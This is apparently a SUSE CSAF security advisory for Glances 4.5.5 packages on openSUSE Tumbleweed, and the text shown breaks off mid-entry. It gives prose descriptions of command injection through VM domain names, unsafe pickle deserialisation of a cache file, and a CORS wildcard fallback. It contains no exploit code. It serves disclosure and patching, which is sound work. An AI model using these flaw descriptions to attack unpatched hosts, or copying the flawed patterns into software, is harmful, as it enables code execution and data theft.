|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.5-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11122",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11122-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46606/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46607 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46607/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-53925 page",
"url": "https://www.suse.com/security/cve/CVE-2026-53925/"
}
],
"title": "glances-common-4.5.5-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-25T00:00:00Z",
"generator": {
"date": "2026-06-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11122-1",
"initial_release_date": "2026-06-25T00:00:00Z",
"revision_history": [
{
"date": "2026-06-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.aarch64",
"product": {
"name": "glances-common-4.5.5-1.1.aarch64",
"product_id": "glances-common-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product_id": "python311-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product_id": "python313-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product_id": "python314-Glances-4.5.5-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.5-1.1.ppc64le",
"product_id": "glances-common-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product_id": "python311-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product_id": "python313-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product_id": "python314-Glances-4.5.5-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.s390x",
"product": {
"name": "glances-common-4.5.5-1.1.s390x",
"product_id": "glances-common-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.5-1.1.s390x",
"product_id": "python311-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.5-1.1.s390x",
"product_id": "python313-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python314-Glances-4.5.5-1.1.s390x",
"product_id": "python314-Glances-4.5.5-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.x86_64",
"product": {
"name": "glances-common-4.5.5-1.1.x86_64",
"product_id": "glances-common-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product_id": "python311-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product_id": "python313-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product_id": "python314-Glances-4.5.5-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64"
},
"product_reference": "glances-common-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x"
},
"product_reference": "glances-common-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64"
},
"product_reference": "glances-common-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python314-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python314-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python314-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python314-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-46606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46606"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances - commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46606",
"url": "https://www.suse.com/security/cve/CVE-2026-46606"
},
{
"category": "external",
"summary": "SUSE Bug 1268800 for CVE-2026-46606",
"url": "https://bugzilla.suse.com/1268800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46606"
},
{
"cve": "CVE-2026-46607",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46607"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path - through any of several realistic local or container-level scenarios - can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46607",
"url": "https://www.suse.com/security/cve/CVE-2026-46607"
},
{
"category": "external",
"summary": "SUSE Bug 1268854 for CVE-2026-46607",
"url": "https://bugzilla.suse.com/1268854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46607"
},
{
"cve": "CVE-2026-46608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46608"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
